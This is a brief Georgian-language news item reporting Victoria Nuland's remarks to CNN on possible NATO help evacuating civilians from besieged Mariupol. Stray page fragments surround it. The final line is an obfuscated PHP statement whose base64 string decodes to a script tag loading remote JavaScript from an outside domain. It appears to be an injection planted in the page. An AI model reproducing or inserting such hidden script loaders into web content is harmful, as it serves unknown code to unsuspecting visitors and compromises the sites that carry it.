celsiusi
ავერსი შნაიდერი
ნატოს მოკავშირეები შესაძლოა მარიუპოლიდან მშვიდობიანი მოსახლეობის უსაფრთხო გამოყვანაში ჩაერთონ. ამის შესახებ ამერიკულ ტელეარხ CNN-ს შეერთებული შტატების სახელმწიფო მდივნის მოადგილემ ვიქტორია ნულანდმა განუცხადა.
 
„იყო გარკვეული იმედი, რომ რუსებმა მარიუპოლიდან შესაძლოა დაუშვან მშვიდობიანი მოქალაქეებისა და დაჭრილი ჯარისკაცებისთვის უსაფრთხო გამოყვანა. ამაში ნატოს მოკავშირეები ჩაერთვებიან, თუ ეს მოხდება“ , - აღნიშნა ნულანდმა.
 
მისივე თქმით, ასეთი შეთანხმება ადრე არაერთხელ ჩაიშალა და საბოლოო ჯამში, რუსების გადასაწყვეტია უსაფრთხო გასასვლელების დაშვება.
 
ნულანდმა დასძინა, რომ მარიუპოლის ალყა "ამ ომის სისასტიკეზე" და ომის დანაშაულებზე მეტყველებს, რომელსაც ვლადიმერ პუტინი სჩადის.
1242
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");